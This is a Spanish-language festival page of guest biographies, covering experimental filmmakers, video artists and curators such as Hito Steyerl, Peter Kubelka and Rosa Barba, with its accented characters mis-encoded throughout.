Invitados


Adriana Vila Guevara

Adriana Vila Guevara


Realizadora audiovisual y antropA?loga venezolana dedicada a la contemplaciA?n de imaginarios y sus miscelA?neas representaciones, la confusiA?n e invenciA?n de los recuerdos y la inducciA?n de experiencias perceptivas (fugaces pero nobles). Con una investigaciA?n doctoral en antropologA�a y autorA�a documental, integrante de CrA?ter Collective y cofundadora del laboratorio de cine artesanal Crater-Lab, su obra se desplaza entre fA?rmulas de creaciA?n documental y la experimentaciA?n fA�lmica en SA?per 8, Single 8 y 16 mm combinando material encontrado, filmaciones propias y la intervenciA?n artesanal del celuloide y los aparatos cinematogrA?ficos en forma de instalaciones y cine expandido. (+) www.adrianavilaguevara.com

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Antoni Pinent

Antoni Pinent


Antoni Pinent (EspaA�a, 1975) es un film curator, programador, productor y realizador experimental, cuyo trabajo ha sido proyectado en diferentes cinematecas, centros culturales y museos, como el MoMA de San Francisco (2012).
Algunos de sus films precedentes son: GIOCONDA / FILM (1999), MA?sica visual en vertical (1999-2000), entre otros, y la trilogA�a Film quartet, que comprende G/R/E/A/S/E (2008-2013), KINOSTURM KUBELKA / 16 variaciones (2009) y FILM QUARTET / POLYFRAME (2006-2008), este A?ltimo premiado en varios festivales.
Ha recibido el premio de la II Bienal del Museum of Contemporary Cinema (MoCC, Nueva York-ParA�s-Madrid) en noviembre de 2008.

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Arthur Omar - Retrato

Arthur Omar


Arthur Omar es cineasta, fotA?grafo, artista plA?stico y escritor. Ha realizado contribuciones significativas en cada una de las A?reas en las que se desenvuelve reuniendo la innovaciA?n tecnolA?gica con una gran intensidad dramA?tica. ParticipA? en dos ediciones de la Bienal de San Pablo, en una de ellas con la serie fotogrA?fica AntropologA�a del rostro glorioso, de la cual se editA? un libro con el mismo nombre. En la otra, con imA?genes tomadas en AfganistA?n central, en la zona de catA?strofe entre Kabul y Bamiyan, lo que motivA? su libro mA?s reciente, Viaje a AfganistA?n, con prefacio del filA?sofo italiano Antonio Negri. Otros de sus libros son El zen y el glorioso arte de la fotografA�a, Esplendor de los contrarios y LA?gica del A�xtasis. Se presentA? una retrospectiva de sus pelA�culas y videos en The Museum of Modern Art de Nueva York. Ha realizado exposiciones individuales en el Centro Cultural Banco do Brasil, de RA�o de Janeiro y de San Pablo, como Esplendor de los contrarios, con imA?genes en 3D. Otras exposiciones: Fracciones de luz, Demonios, espejos y mA?scaras celestiales, y Una mirada y siete velos. En el Instituto Oi Futuro de RA�o de Janeiro presentA? Zooprismas, un conjunto de 12 videoinstalaciones, destacado por el diario O Globo como la mejor exposiciA?n del aA�o. En el festival VideoBrasil presentA? Dervixxx y la TrilogA�a cognitiva en proyecciones circulares. Su largometraje Triste trA?pico es considerado un clA?sico del cine brasileA�o. DirigiA? y produjo varios filmes para Channel Four y ZDF Arte, como el largometraje SueA�os e historias de fantasmas. En el Oi Futuro de Belo Horizonte presentA? Las puertas de la percepciA?n, con fotografA�as e instalaciones. Su nuevo libro, lanzado en septiembre de 2014 es Antes de ver. Un experimento en teorA�a de la imagen, un libro de teorA�a fotogrA?fica, con mA?s de 160 fotografA�as inA�ditas.

Carol Illanes y Matías Allende

Carol Illanes y MatA�as Allende


MatA�as Allende y Carol Illanes conforman desde hace tres aA�os una dupla curatorial y dirigen proyectos que vinculan la historia de las imA?genes de lo local con la producciA?n artA�stica contemporA?nea. En su grupo de exposiciones: Historia forzada: bifurcaciones del arte joven en Chile (Sala Juan Egenau, UCH), Trabajo en utopA�a: A?xidos de la UNCTAD III (GalerA�a Macchina, UC), Al interior. AndrA�s Denegri (GalerA�a Video Concreta, M100) y Ciudad SA�sifo (Museo de Arte ContemporA?neo), esta relaciA?n se ha trazado mediante la construcciA?n de un relato que hace dialogar obras sobre la ciudad, la arquitectura y la identidad, principalmente desde los soportes del video y la instalaciA?n. Ambos se formaron en teorA�a del arte en la Universidad de Chile y actualmente pertenecen al grupo Archivos (Proyecto Bicentenario de la UCH). Juntos publicaron recientemente el libro Trabajo en utopA�a: modernidad arquitectA?nica en el Chile de la Unidad Popular.

MatA�as Allende ha desarrollado una investigaciA?n en torno a la relaciA?n entre arte y arquitectura local. Actualmente es investigador para el CatA?logo Razonado del MAC y redactor permanente en arteycritica.org.

Carol Illanes ha desarrollado una investigaciA?n sobre arte, polA�tica y espacio pA?blico. Actualmente ejecuta tres proyectos relacionados con arte y ciudad. Es codirectora de arteycritica.org.

Clara Garavelli

Clara Garavelli


Es profesora de Estudios Latinoamericanos en la University of Leicester (Reino Unido). Miembro del comitA� editorial de Secuencias. Revista de Historia del Cine. Ha coeditado el libro Reflexiones fragmentadas: pensar los Estudios Culturales desde EspaA�a (2012) y el dossier especial sobre cine y video experimental argentino de Imagofagia (2014). Coautora de obras colectivas como The Cinema of the Swimming Pool (2014) y Directory of World Cinema: Argentina (2014), entre otras. Cuenta con varias publicaciones sobre cine y cultura visual. Fue jurado del Festival Internacional de Video Arte (FIVA 2012 y 2013, Argentina).

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Claudia Joskowicz

Claudia Joskowicz


Claudia Joskowicz, artista plA?stica boliviana, vive y trabaja en Nueva York y en Santa Cruz de la Sierra. RecibiA? un magA�ster en Artes PlA?sticas de la New York University en el aA�o 2000. Sus exposiciones individuales incluyen LMAK Projects, Forever & Today, Inc., Thierry Goldberg Projects y Momenta Art en Nueva York; Dot Fiftyone en Miami; California Museum of Photography en Riverside, California; GlalerA�a ACBEU en Salvador, Brasil; Espacio SimA?n PatiA�o y Museo Nacional de Arte de La Paz y el Centro Cultural Santa Cruz y GalerA�a Kiosko en Santa Cruz (Bolivia), y Lawndale Art Center en Houston para la Bienal de FotografA�a Fotofest. Joskowicz es docente en el departamento de artes plA?sticas Steinhardt de la New York University.

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David Dinnell

David Dinnell


Director de programaciA?n, Ann Arbor Film Festival. David Dinnell es realizador y programador, y reside en Ann Arbor, Michigan, Estados Unidos. Ha sido programador del Ann Arbor Film Festival desde 2006 y se convirtiA? en su director en 2010. Previamente fue programador del Union Theatre de la Universidad de Wisconsin-Milwaukee durante cinco temporadas y director de ProgramaciA?n del Media City Film Festival (Windsor, CanadA?) en sus ediciones undA�cima y duodA�cima. Ha curado programas especiales para el Museo de Arte ContemporA?neo de Detroit, el California Institute for the Arts, el Wisconsin Film Festival, la School of the Art Institute of Chicago y el Etiuda & Anima Film Festival de Cracovia (Polonia), entre otros. Es coprogramador de la ediciA?n de otoA�o 2014 de los Flaherty NYC Series en Anthology Film Archives, Nueva York. Su obra se exhibiA? en distintas partes del mundo incluyendo el International Film Festival Rotterdam, EXIS (Experimental Film & Video Festival, SeA?l), Jihlava International Documentary Film Festival (RepA?blica Checa), Images Festival (Toronto) y el Festival de Cine de Nueva York en la secciA?n Views from the Avant Garde.

Emilio Bernini

Emilio Bernini


Emilio Bernini dirige la MaestrA�a en Cine Documental de la Universidad del Cine. PrologA? Cine expandido, de Gene Youngblood, editado por la Universidad Nacional de Tres de Febrero. PublicA? un estudio crA�tico sobre la obra experimental de Narcisa Hirsch, en la ediciA?n en DVD de MQ2, y algunos ensayos sobre found footage en el cine experimental y en el cine documental. Dirige la revista KilA?metro 111. Ensayos sobre Cine.

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Enrique-Ramírez

Enrique RamA�rez


Nace en Santiago de Chile en 1979. Es Comunicador Audiovisual con menciA?n en Cine, Instituto Arcos, Santiago, Chile, y Master en Arte ContemporA?neo y Nuevos Medios del Studio National Des Arts Contemporains, Le Fresnoy, Francia. En el aA�o 2014 gana el premio a�?prix A� la dA�couvertea�? del palais de tokyo y el primer premio de Loop fair barcelona. La obra de Enrique RamA�rez podrA�a ser descrita como incursiones poA�ticas. Sus pelA�culas, fotografA�as e instalaciones trabajan con la polA�tica del A�xodo, del exilio y de la discontinuidad de la memoria, pero para RamA�rez se trata siempre de una ardua bA?squeda en el imaginario subjetivo. Los vastos paisajes que a menudo aparecen en su trabajo son concebidos como espacios geo-poA�ticos de la imaginaciA?n, territorios abiertos para la visiA?n y para deambular. El A?nimo de las imA?genes es de estado contemplativo: los paisajes, la brisa, el agua, la arena, parecen trabajar juntos en un esfuerzo por dar una visiA?n subjetiva.
www.enriqueramirez.net

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Gabriel Soucheyre


Gabriel Soucheyre Director del Festival Internacional de Artes Digitales VIDEOFORMES de Clermont-Ferrand desde 1986, y del Archivo Digital VIDEOFORMES. Editor de Turbulences Video (revista trimestral de video arte y cultura digital), curador de la Galerie de la��Art du Temps (galerA�a de arte basado en el tiempo). Participa en varios eventos tanto nacionales como internacionales como curador y jurado. Profesor de la UniversitA� Blaise Pascal, Clermont-Ferrand. Vlogger y realizador de videos.

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Gregorio Viera


Gregorio Viera (Santa Cruz de Tenerife, Islas Canarias, 1971) desarrolla sus trabajos artA�sticos esencialmente dentro de los terrenos del video y la performance, ocasionalmente realiza proyectos de otras A?reas, como el dibujo o la interactividad multimedia. Se formA? y trabajA? durante varios aA�os en Madrid y Alemania, tanto en disciplinas artA�sticas y escA�nicas como en diseA�o, video y derivados, y realizA? proyectos en eventos y espacios del A?mbito nacional e internacional.
www.gregorioviera.com

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Hilke

Hilke Doering


Nacida en 1966 y criada entre Alemania y Suiza, estudiA? sociologA�a en Bielefeld y ParA�s, y realizA? investigaciones en sociologA�a y etnografA�a visual. Vive con su pareja y su hijo en Bielefeld. Ha trabajado con el festival desde 1995 como jefa de la Competencia Internacional, la secciA?n para niA�os y jA?venes y el Mercado. Ha sido miembro activa de la junta para la CoordinaciA?n Europea de Festivales de Cine entre 1996 y 2000 y ha sido asimismo presidente de la Conferencia Internacional del Cortometraje entre 1998 y 2003. Desde 1996 ha sido jurado y curadora de programas para numerosos festivales internacionales de cine, incluyendo Split, Venecia, Cork, Grimstad, Bucharest, Berwick, entre otros.

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Hito Steyerl

Hito Steyerl


NaciA? en 1966 en MA?nich, Alemania. Es cineasta y trabaja como realizadora y autora en el campo del cine y video documental de ensayo, media art y videoinstalaciA?n. Se dedica desde hace aA�os a los medios de comunicaciA?n y al anA?lisis de la circulaciA?n masiva y global de imA?genes. Doctora en FilosofA�a por la Universidad de Viena y profesora de New Art Media en la Universidad de BerlA�n, sus ensayos crA�ticos se centran en temas como el feminismo, el militarismo y, sobre todo, la proliferaciA?n y difusiA?n del conocimiento a travA�s de las imA?genes como consecuencia de las tecnologA�as digitales. Como artista y documentalista participA? en distintas muestras individuales, festivales y bienales de todo el mundo, entre otras, Documenta 12 en 2007, Bienal de Shanghai 2008, Bienal de Taipei 2010 y Bienal de Venecia 2013. En ocasiA?n de la Bienal de la Imagen en Movimiento y con apoyo del Goethe-Institut, la editorial Caja Negra presenta Los condenados de la pantalla, su primer libro traducido al espaA�ol.

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Ioannis Savvidis2

Ioannis Savvidis


Ioannis Savvidis naciA? en Alemania y terminA? sus estudios en arte visual en el Hochschule der KA?nste Berlin. Con su enfoque en las narrativas arquitectA?nicas y un entendimiento alternativo del urbanismo y de la planificaciA?n social, su prA?ctica visual utiliza dibujos, video, e instalaciones especA�ficas para el sitio. La obra de Savvidis ha sido exhibida en el Museo Estatal del Arte ContemporA?neo y el Museo del Cine en SalA?nica, el Museo Riso, Catania, en galerA�as privadas, espacios de proyectos e instituciones como el Kunstwerke, el Roter Salon, en el II Kunstsalon y los Tacheles en BerlA�n, la Feria Art-Athina y el Centro Cultural Municipal y el centro de arte About en Atenas, la galerA�a CWS en Varsovia, el Proyecto Pedestrian II Instambul, y en festivales de cine en Alburquerque y Belgrado. Es colaborador y miembro de la Eve Sussmans Rufus Corporation (EEUU) y del LoAndBehold Artists’ Group (Reino Unido).

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José Alejandro Restrepo

JosA� Alejandro Restrepo


JosA� Alejandro Restrepo (BogotA?, 1959) trabaja en videoarte desde 1987. Su campo de acciA?n abarca videos monocanal, videoperformance y videoinstalaciA?n. Expone regularmente en el paA�s y en el extranjero. Su actividad incluye la investigaciA?n y la docencia. Entre sus A?ltimas participaciones estA?n: Bienal de la Habana (1995 y 2000); 23A? Bienal Internacional de Sao Paulo (1996); The Sense of Place, Centro de Arte Reina SofA�a (1998); Tempo, The Museum of Modern Art, MOMA QNS, Nueva York (2002); EntrelA�neas, La Casa Encendida, Caja Madrid (2002); Big Sur, The Project, Los A?ngeles (2002); BotA?nica PolA�tica, Sala Montcada, FundaciA?n La Caixa, Barcelona (2002); Memory Lessons, MusA�e du Louvre, ParA�s, (2002); We Come in Peace… Histories of the Americas, Museo de Arte ContemporA?neo de Montreal (2002); The Hours, Irish Museum of Modern Art, Dublin (2005); 52A? Bienal de Venecia (2007); Bienal de Mercosul, Porto Alegre (2011); Bienal de Lyon (2011) y Museo del Quai Branly (2013).

José Carlos Mariátegui

JosA� Carlos MariA?tegui


Lima, 1975. Escritor, curador y emprendedor en cultura, nuevos medios y tecnologA�a. EstudiA? biologA�a y es bachiller en MatemA?ticas Aplicadas por la Universidad Peruana Cayetano Heredia (Lima). Tiene una MaestrA�a (MSc) y un Doctorado (PhD) en Sistemas de InformaciA?n e InnovaciA?n de la London School of Economics and Political Science (LSE). Es fundador de Alta TecnologA�a Andina (ATA), dedicada al desarrollo de proyectos en arte, ciencia y tecnologA�a en AmA�rica Latina y fue director-fundador de la Casa Museo JosA� Carlos MariA?tegui del Ministerio de Cultura (1995 – 2005). Ha sido curador de exhibiciones de arte y tecnologA�a a nivel internacional, como: VideografA�as In(visibles), Emergentes y VideoXXI – Lemaitre Collection, entre otras. Ha sido miembro de la ComisiA?n Nacional de Cultura del Gobierno del PerA? (2001 – 2002) y del ComitA� Consultivo del Ministerio de Cultura (2010, 2012 – 2013). Es miembro del Network Committee de la Prince Claus Fund (Holanda) y del ComitA� Editorial de la Serie Leonardo, libros sobre arte, ciencia y tecnologA�a publicados por MIT Press (Estados Unidos).
www.ata.org.pe

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Lauren Howes


Lauren Howes trabaja como directora ejecutiva del Canadian Filmmakers Distribution Centre desde 2006. Antes de instalarse en Toronto, trabajA? como ejecutiva de distribuciA?n en la secciA?n Video Out Distribution de VIVO Media Arts en Vancouver. Debido a su trabajo como distribuidora, asiste a numerosos festivales de cine y mercados de arte medial en el mundo entero y promueve el arte medial canadiense. PresentA? curadurA�as en DublA�n, San Pablo, RA�o de Janeiro, Hamburgo, ParA�s, Londres, BerlA�n y SeA?l. Se graduA? en 1996 con un BFA en Film Production en la Simon Fraser University. Howes actualmente es presidente del Board of the Media Arts Network of Ontario (MANO) y ha colaborado con el Board of Independent Media Arts Alliance entre 2008 y 2010.

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Lucas Bambozzi

Lucas Bambozzi


Lucas Bambozzi es un artista e investigador de nuevos medios que produce instalaciones, videos monocanal y proyectos interactivos. Sus trabajos han sido exhibidos en muestras individuales y colectivas en mA?s de 40 paA�ses organizadas por instituciones como el MoMA y la Bienal ZERO1 en los Estados Unidos; ZKM, Frankfurter Kunstverein e ISEA-Ruhr, en Alemania; Laboral y Caja Expandida en ARCO, EspaA�a; GalerA�a http en Londres; Bienal de La Habana en Cuba; galerA�a A�KUC en Eslovenia; WRO Bienal de Arte Multimedia en Polonia; Centro Georges Pompidou en Francia; Bienal de Artes Mediales en Chile y diversas instituciones en Brasil, incluyendo la Bienal de San Pablo. ParticipA? de festivales de cine y video como Sundance, Slamdance, FID Marseille, Videobrasil, Ita��s All True Festival, Impakt, Festival do Rio BR, Share Festival en Italia, FILE, On-Off, entre muchos otros. RecibiA? dos veces el premio para el programa de arte de la FundaciA?n Vitae, y en 2012 fue galardonado con el prestigioso premio Sergio Motta. Es uno de los iniciadores del festival arte.mov (2006-2012), la muestra Multitud (Sesc PompA�ia, San Pablo, 2014) y el proyecto Labmovel.
http://www.lucasbambozzi.net

Luciano Zubillaga

Luciano Zubillaga


Luciano Zubillaga es un artista argentino residente en Londres desde 1992. RecibiA? el London Artist Film and Video Awards (LAFVA) en 2008, otorgado por Arts Council England y Film London. Recientemente ha mostrado obra en Ann Arbor Film Festival; Festival del Nuevo Cine Latinoamericano de La Habana, Cuba; Armory Show, Nueva York; BFI Southbank, Whitechapel Art Gallery, Frieze Art Fair, Londres. Es profesor titular de la materia Cine y Video Experimental en Ealing School of Art, Design and Media, University of West London.
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Luis Macías

Luis MacA�as


Luis MacA�as
Artista, cineasta, reciclador de imA?genes e investigador fA�lmico. Es miembro de CrA?ter Collective y cofundador del laboratorio de cine artesanal Crater-Lab. Sus obras en formato fA�lmico 8 mm, SA?per 8 y 16 mm son concebidas como proyectos de film performance o expanded cinema. Sus inquietudes artA�sticas se centran en dos puntos: el trabajo fA�sico sobre la pelA�cula cinematogrA?fica, concibiendo cada pieza a partir de su formato especA�fico videogrA?fico o cinematogrA?fico; asA� como el reciclaje y reinvenciA?n de nuevas relaciones entre las imA?genes en movimiento. Estas propuestas se conciben tanto para la proyecciA?n en sala oscura como para performance o instalaciA?n en el cubo blanco. Paralelamente, desarrolla talleres teA?rico-prA?cticos especializados en distintas variantes de cine experimental: found footage, cine sin cA?mara, Super 8, procesos artesanales, tanto en escuelas de cine como en centros de arte y museos.
http://www.luismacias.es/

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Nadia Seboussi


Nadia Seboussi es originaria de Argelia. Obtuvo su tA�tulo en estudios aplicados a las comunicaciones y un tA�tulo en ingenierA�a electrA?nica en la Universidad de Argel. Luego de sus estudios, trabajA? como periodista en la prensa francA?fona hasta el 2001. En 2002 emigrA? a CanadA?, donde realizA? estudios de artes visuales y multimediales.
Nadia ha recibido varias becas y destacados premios: el premio Pierre Ayot en 2010, Premio al referente Femenino del Consejo de las Artes, premios de Excelencia Autodesk y Jacques en 2008 y 2009, respectivamente. En 2010-2011, obtuvo la beca de excelencia otorgada por el Consejo de Investigaciones en Ciencias Sociales y Humanidades de CanadA?. Actualmente es becaria del programa Claudine and Stephen Brofman en arte contemporA?neo (2013-2015).

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Nicole Gingras

Nicole Gingras


Nicole Gingras. Residente en Montreal, Nicoles es investigadora, curadora independiente y autora. Se interesa particularmente por la imagen, sea visual, auditiva o textual. Las muestras y programas que ha curado y las publicaciones que ha dirigido, sus textos asA� como los seminarios, lidian con las nociones de tiempo, proceso creativo, movimientos de rastros de pensamiento y memoria. Ha colaborado con numerosos museos, galerA�as, centros dirigidos por artistas y festivales en CanadA? y el exterior. En 2012 recibiA? el premio de la FundaciA?n Hnatyshyn a la Excelencia en CuradurA�a en Arte ContemporA?neo. Sus proyectos curatoriales mA?s recientes incluyen Raymond Gervais 3 x 1 (Montreal, 2011-2012), una muestra de dos partes con una publicaciA?n, focalizada en el pionero del arte conceptual canadiense, Machines a�� The Shapes of Movement / MA?quinas a�� Las formas del movimiento (Quebec, 2012), una serie de 14 muestras para el Manif da��art biennial; y Karen Trask a�� La��ombre et la forme / Karen Trask-La sombra y la forma (Laval, 2014).

pablo lobato

Pablo Lobato


Pablo Lobato naciA? en 1976 en Bom Despacho, Brasil, y actualmente vive y trabaja en Belo Horizonte, Brasil. Se titulA? en Bellas Artes por la Pontifica Universidad CatA?lica de Minas Gerais, Brasil, en 1999. Trabaja con diferentes medios como ser el cine, la fotografA�a, obras site-specific, escultura y objetos. Fue uno de los creadores de Teia a��un centro para investigaciA?n y producciA?n audiovisual con base en Belo Horizonte (2002-2014). Su largometraje Acidente recibiA? el premio a mejor documental Iberoamericano en Guadalajara, MA�xico, en 2007. En 2009 recibiA? una beca de la FundaciA?n John Simon Guggenheim. Lobato ha exhibido sus trabajos internacionalmente en la A?ltima dA�cada en festivales como Sundance, Locarno y Rotterdam, asA� como en una serie de exposiciones en el New Museum de Nueva York, el Museo Tamayo de Arte ContemporA?neo en MA�xico, el Museo de Arte Moderno de SA?o Paulo, y la Akademie der Kunst en BerlA�n. Actualmente su trabajo se puede encontrar en las colecciones del Museu da��Art Contemporani de Barcelona, Sharjah Art Foundation en los Emiratos A?rabes Unidos y el museo de Arte Moderno de Rio de Janeiro, entre otras.

Representado por : http://www.lucianabritogaleria.com.br/artists/27

Paz.Encina

Paz Encina


Paz Encina naciA? en AsunciA?n, Paraguay, en 1971. CursA? la Licenciatura en CinematografA�a en la Universidad del Cine, que concluyA? en el aA�o 2001. RealizA? videoinstalaciones y cortometrajes en cine y video, ganadores de varios premios. Entre los aA�os 2002 y 2004 se desempeA�A? como docente en distintas universidades. En el aA�o 2006 estrenA? su primer largometraje Hamaca paraguaya, ganador de varios premios como el Fipresci en el Festival de Cannes 2006 y el Premio Luis BuA�uel a la mejor pelA�cula iberoamericana. En el aA�o 2011, a pedido del Canal Encuentro, realizA? los cortometrajes RA�o Paraguay y 3 movimientos y, a pedido de la FundaciA?n Gulbenkian, el cortometraje Viento sur, ganador de varios premios. En diciembre del aA�o 2012 realizA? la instalaciA?n Notas de memoria por los veinte aA�os del hallazgo del Archivo del Terror. Actualmente se encuentra trabajando en su prA?ximo largometraje de nombre Ejercicios de memoria.

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Peter Kubelka

Peter Kubelka


Peter Kubelka es un cineasta austriaco nacido en Viena en 1934. Es ademA?s el co-fundador del Osterreichisches Filmmuseum (Viena) y de los Anthology Film Archives (Nueva York). Curador, archivista, profesor, arquitecto, mA?sico, coleccionista y cocinero; de hecho esta A?ltima actividad ocupa un papel tan central en su filosofA�a fA�lmica que una vez agregA? a�?y Cocinaa�? al tA�tulo formal de su puesto de Profesor de Cine en la Escuela de Bellas Artes de Frankfurt. Peter Kubelka es influyente como pocas personas en la historia del cine y su tradiciA?n ligada a las vanguardias. Sus pelA�culas marcan un nuevo modo de entender los efectos del cine en la historia. En este programa se proyectarA?n las obras Adebar (1957), Schwechater (1958), Arnulf Rainer (1960) y Unsere Afrikareise (1966).

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Raquel Ponce


Raquel Ponce (Las Palmas de Gran Canaria, Islas Canarias, 1972) es licenciada en Historia del Arte y se forma y trabaja como bailarina, actriz y directora escA�nica en Canarias y Madrid. Fue intA�rprete de numerosos espectA?culos de danza y performance entre los que se destacan los realizados con Gary Stevens (And), Xavier Le Roy (Extensions, Proyect) y Tino Seghal, presentados en varias ciudades europeas (A?msterdam, Lisboa, ParA�s, Bruselas, BerlA�n, Estocolmo, Ginebra).
Ha llevado a cabo proyectos de carA?cter expositivo que pudieron verse en el Centro AtlA?ntico de Arte Moderno (CAAM), el Festival de InvestigaciA?n Sonora y Artes Relacionadas-Display en el Instituto Cervantes de BerlA�n, el festival de performance Cuerpo a Cuerpo en el Centro de Arte La Regenta, el festival Cinemadamare en Italia, la Bienal de Arte de Dakar, el festival de performance BONE en Suiza y el espacio A?rea 60 en el TEA en Santa Cruz de Tenerife.
www.raquelponce.es

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Rosa Barba

Rosa Barba


Rosa Barba (Sicilia, 1972) estudiA? en la Academia de Artes de los Medios en Colonia y en la Rijksakademie van Beeldende Kunsten en A?msterdam. Su trabajo involucra el uso de pelA�cula de 35 mm. y 16 mm. para crear a�?instalaciones del tiempoa�? y pelA�culas. EstA? especialmente interesada en la abstracciA?n de la cinematografA�a como medio para forzar los lA�mites y sus posibilidades. Sus exposiciones individuales recientes incluyen: CAC Vilnius (Lituania, 2014); MAXXI Museo delle Arti del Secolo XXI (Roma, Italia, 2014); Turner Contemporary (Margate, Reino Unido, 2013); Bergen Kunsthall (Noruega, 2013); Cornerhouse (Manchester, Reino Unido, 2013); MUSAC (Castilla y LeA?n, EspaA�a, 2013), Jeu de Paume (ParA�s, 2012); Kunsthaus ZA?rich (Suiza, 2012); Marfa Book Co (Marfa, Texas, 2012) y Museo de Arte ContemporA?neo de San Luis (Estados Unidos, 2012). Ha participado en exposiciones colectivas en instituciones y festivales en todo el mundo y su obra estA? representada en numerosas colecciones internacionales. Las monografA�as Rosa Barba: White is an Image y Rosa Barba: Time as Perspective fueron publicadas por Hatje Cantz en 2011 y 2013, respectivamente. Vive y trabaja en BerlA�n.
www.rosabarba.com

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Salla TykkA�


Salla TykkA� es una artista visual que trabaja con cine y video desde 1996. ParticipA? en la Bienal de Venecia de 2001. Sus A?ltimas exhibiciones individuales incluyen: BALTIC, Centro de Arte ContemporA?neo, Newcastle (2013); Drimart Garibadi, Estambul (2012); EX3 y Hayward Gallery Project Space, Londres (2010). Ha participado en numerosas muestras grupales en museos e instituciones pA?blicas, entre otras: MusA�e Cantonal des Beaux-Arts, Lausana (2013); Istanbul Museum of Modern Art, Estambul (2012); Turner Contemporary, Margate (2011); 17A? Sydney Biennale, Museum of Contemporary Art, Sydney (2010); Tropico-VA�gA�tal, Palais de Tokyo, ParA�s, 2006. Sus films han sido exhibidos ampliamente en festivales internacionales de cine.

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